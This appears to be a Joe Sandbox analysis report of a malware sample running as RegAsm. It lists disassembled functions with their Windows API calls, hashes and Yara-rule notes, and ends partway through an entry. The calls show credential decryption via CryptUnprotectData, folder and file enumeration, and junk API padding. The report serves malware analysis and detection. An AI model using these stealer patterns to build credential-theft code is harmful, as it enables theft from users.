                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID: .
                                                                • API String ID: 3494564517-248832578
                                                                • Opcode ID: 18cae8fdc7a4842098d17b26dcecc80032ff4bfad35f9cad85004e06d59dbd82
                                                                • Instruction ID: 8bf9c4909bdcfd2fc0daec3395b35b448d5b6f19392b116d9c0aad9bcf59667c
                                                                • Opcode Fuzzy Hash: 18cae8fdc7a4842098d17b26dcecc80032ff4bfad35f9cad85004e06d59dbd82
                                                                • Instruction Fuzzy Hash: D2913171A00605EFDB059FE4DC89EEE7BB5FB8C310B008579EA15A32A0DB755D11CBA8
                                                                Function 00402723 Relevance: 33.4, APIs: 22, Instructions: 410filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(00000000), ref: 004027B0
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • LocalFree.KERNEL32(00000000), ref: 004027FF
                                                                • LocalFree.KERNEL32(00000000), ref: 0040280E
                                                                • LocalFree.KERNEL32(00000000), ref: 0040281D
                                                                • LocalFree.KERNEL32(00000000), ref: 00402828
                                                                • LocalFree.KERNEL32(00000000), ref: 00402833
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 0040292F
                                                                • LocalFree.KERNEL32(00000000), ref: 00402959
                                                                • LocalFree.KERNEL32(?), ref: 00402960
                                                                • LocalFree.KERNEL32(00000000), ref: 0040298C
                                                                • LocalFree.KERNEL32(?), ref: 00402993
                                                                • lstrlenW.KERNEL32(?), ref: 00402ACC
                                                                • LocalFree.KERNEL32(00000000), ref: 00402BEC
                                                                • LocalFree.KERNEL32(?), ref: 00402BFA
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$TimerWaitable$Event$CancelDebugEnvironmentErrorFileLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseCopyHandleMappingResetlstrlen
                                                                • String ID:
                                                                • API String ID: 1649479735-0
                                                                • Opcode ID: f2deb0beec082841e9698fb9d51fb477fde48a08b6344bb2902ee2f077badf70
                                                                • Instruction ID: 3891058dcb2b340212b430655327b39494642ecf0f9445dbcfcfb16ac14c3160
                                                                • Opcode Fuzzy Hash: f2deb0beec082841e9698fb9d51fb477fde48a08b6344bb2902ee2f077badf70
                                                                • Instruction Fuzzy Hash: DAE14D71900615EFDB11DFA4ED48AEE7BB6FF88310F148075E911B72A0DB785901CBA9
                                                                Function 00402C05 Relevance: 31.9, APIs: 21, Instructions: 440filestringencryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(00000000), ref: 00402C94
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402CB2
                                                                • StrCpyW.SHLWAPI(?,?), ref: 00402CD4
                                                                • LocalFree.KERNEL32(00000000), ref: 00402CDF
                                                                • LocalFree.KERNEL32(00000000), ref: 00402CEE
                                                                • LocalFree.KERNEL32(00000000), ref: 00402CFD
                                                                • LocalFree.KERNEL32(00000000), ref: 00402D0C
                                                                • LocalFree.KERNEL32(00000000), ref: 00402D17
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00402E33
                                                                • DeleteFileW.KERNEL32(?), ref: 00402E81
                                                                • LocalFree.KERNEL32(?), ref: 00402E88
                                                                • LocalFree.KERNEL32(00000000), ref: 00402EA0
                                                                • wsprintfW.USER32 ref: 00403055
                                                                • lstrlenW.KERNEL32(00000000), ref: 0040305F
                                                                • wsprintfW.USER32 ref: 004030FA
                                                                • lstrlenW.KERNEL32(00000000), ref: 00403104
                                                                • LocalFree.KERNEL32(00000000), ref: 0040311F
                                                                • LocalFree.KERNEL32(?), ref: 00403128
                                                                • LocalFree.KERNEL32(00000000), ref: 00403136
                                                                • LocalFree.KERNEL32(00000000), ref: 00403140
                                                                • DeleteFileW.KERNEL32(?), ref: 00403177
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$FileTimerWaitable$Event$CancelDebugDeleteEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariablelstrlenwsprintf$AllocCloseCopyCryptDataHandleMappingResetUnprotect
                                                                • String ID:
                                                                • API String ID: 2278141367-0
                                                                • Opcode ID: a7497a43ccca6f3715db2592b97e2c0b7f0a34b677d405d51fe7ee2b75348e7c
                                                                • Instruction ID: f5beb4675c52ca0de4374a6629b85e5d4c2131aa3c708fc54256f4d51f8f127f
                                                                • Opcode Fuzzy Hash: a7497a43ccca6f3715db2592b97e2c0b7f0a34b677d405d51fe7ee2b75348e7c
                                                                • Instruction Fuzzy Hash: F1021B71900609EFDB159FE0ED49AEEBFB6FB88300F108075E911B62A0DB755A50DF98
                                                                Function 00410952 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 273fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 004109A7
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00410AED
                                                                • LocalFree.KERNEL32(00000000), ref: 00410BC4
                                                                • LocalFree.KERNEL32(0041022B), ref: 00410BCE
                                                                • LocalFree.KERNEL32(00000000), ref: 00410BD7
                                                                • LocalFree.KERNEL32(00000000), ref: 00410BDE
                                                                • LocalFree.KERNEL32(00000000), ref: 00410BE5
                                                                • CloseHandle.KERNEL32(?), ref: 00410BEF
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C4A
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C51
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C5A
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C61
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C6A
                                                                • LocalFree.KERNEL32(00000000), ref: 00410C71
                                                                • LocalFree.KERNEL32(?), ref: 00410C9E
                                                                • FindClose.KERNEL32(00000000), ref: 00410CA5
                                                                  • Part of subcall function 0040FB52: LocalAlloc.KERNEL32(00000040,00000000,?,?,00410A58), ref: 0040FB85
                                                                  • Part of subcall function 0040FB52: LocalFree.KERNEL32(XA,?,?,00410A58), ref: 0040FC06
                                                                  • Part of subcall function 00410952: LocalFree.KERNEL32(00000000), ref: 00410A3C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$CloseFileFind$AllocFirstHandleSize
                                                                • String ID: .
                                                                • API String ID: 3513501344-248832578
                                                                • Opcode ID: 20ed92a25617df6209e5627faf0938320bd2ba6c8d6b6c04c0ea987ccdd170a5
                                                                • Instruction ID: a79288c5b51e091fa953eff651415cbae652668d178c43eebeb88646b4cb418e
                                                                • Opcode Fuzzy Hash: 20ed92a25617df6209e5627faf0938320bd2ba6c8d6b6c04c0ea987ccdd170a5
                                                                • Instruction Fuzzy Hash: D1A16271A00605EFDB14DFA0DC89EEE7B75FB88304F108169F915A7291DB789D41CBA8
                                                                Function 004105DE Relevance: 25.8, APIs: 17, Instructions: 300fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00410626
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00410674
                                                                • LocalFree.KERNEL32(00000000), ref: 00410681
                                                                • LocalFree.KERNEL32(00000000), ref: 00410688
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal$FileFindFirstFolderPathSpecial
                                                                • String ID:
                                                                • API String ID: 2611946579-0
                                                                • Opcode ID: c09168d3dfedc445805075496ba849078d4cdfe90ce61b8450b7f094cf1fa599
                                                                • Instruction ID: b3abc58fdfba2b09d71e20f02cc51ce9dd114d511d4b5e32247a5ddc5e2421dc
                                                                • Opcode Fuzzy Hash: c09168d3dfedc445805075496ba849078d4cdfe90ce61b8450b7f094cf1fa599
                                                                • Instruction Fuzzy Hash: 27A16071A00605EFDB15DBA4DC89FEE7BB5FF89310F008029F615A7290DBB49941CBA8
                                                                Function 00409452 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 236fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CopyFileW.KERNEL32(00000000,?,00000000), ref: 004094DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004094F9
                                                                • ReadFile.KERNEL32(004081BE,00000000,-00000001,?,00000000), ref: 0040952E
                                                                • FindClose.KERNEL32(00000000), ref: 004096FA
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
                                                                  • Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
                                                                  • Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
                                                                  • Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
                                                                  • Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
                                                                  • Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
                                                                  • Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
                                                                  • Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB
                                                                • StrStrW.SHLWAPI(0000002E,00000000), ref: 00409602
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                  • Part of subcall function 004084FB: GetFileSize.KERNEL32(00000000,00000000), ref: 004085F0
                                                                • LocalFree.KERNEL32(00000000), ref: 004096D6
                                                                • LocalFree.KERNEL32(00000000), ref: 00409704
                                                                • CloseHandle.KERNEL32(004081BE), ref: 0040970D
                                                                • DeleteFileW.KERNEL32(?), ref: 00409716
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                • LocalFree.KERNEL32(00000000), ref: 0040971F
                                                                • DeleteFileW.KERNEL32(?), ref: 00409728
                                                                • LocalFree.KERNEL32(?), ref: 00409731
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Local$TimerWaitable$FileSemaphore$EventRelease$DebugFreeMutexOutputString$ErrorLast$CloseOpen$AllocCancelEnvironmentFindVariable$MappingReset$ChangeDeleteHandleNotificationlstrlen$CopyFirstGlobalReadSize
                                                                • String ID: .$idb
                                                                • API String ID: 1036663770-1923612777
                                                                • Opcode ID: c3c3ec804216bbccf54bfac9492eb1069aebd502708958982dc53d02f0b12f3d
                                                                • Instruction ID: 6600bc9669456c75c1548beabd834cbc03eda2d9fb417775d0fc27846d305e05
                                                                • Opcode Fuzzy Hash: c3c3ec804216bbccf54bfac9492eb1069aebd502708958982dc53d02f0b12f3d
                                                                • Instruction Fuzzy Hash: 83815475A00605EFDB15DFE4DC95EEE7BB9FB88300F048079E915A7291DB789D008BA8
                                                                Function 004070C9 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 233fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?), ref: 0040711A
                                                                • LocalFree.KERNEL32(00000000), ref: 00407124
                                                                • LocalFree.KERNEL32(?), ref: 00407364
                                                                • LocalFree.KERNEL32(?), ref: 0040738B
                                                                • FindClose.KERNEL32(00000000), ref: 00407392
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal$Find$CloseFileFirst
                                                                • String ID: .
                                                                • API String ID: 422121646-248832578
                                                                • Opcode ID: edcebe9ce0d5a74f1b4f6f6850d735783998a189ddc4013a32af8637fd02e642
                                                                • Instruction ID: 5f164208ef0b6f0056d08abd7c16de3dc98ce71695939afe5029a15871e29c31
                                                                • Opcode Fuzzy Hash: edcebe9ce0d5a74f1b4f6f6850d735783998a189ddc4013a32af8637fd02e642
                                                                • Instruction Fuzzy Hash: A3815F71A00605EFDB14DFA4DC49EEE7BB5FB88310F108169FA15A7290D778A901CBA9
                                                                Function 0040CA58 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 232fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(00000000,?), ref: 0040CAA7
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CAB1
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CCF0
                                                                • LocalFree.KERNEL32(0040C929), ref: 0040CD17
                                                                • FindClose.KERNEL32(00000000), ref: 0040CD1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal$Find$CloseFileFirst
                                                                • String ID: .
                                                                • API String ID: 422121646-248832578
                                                                • Opcode ID: 74752e9a6074b5a3a81f59100e89eb1074740e7a5a2e13c8a376f63f6251df2b
                                                                • Instruction ID: 52cc22178a8c6914cf4de74923a509fc4cd343a0353413116b11185622f450b5
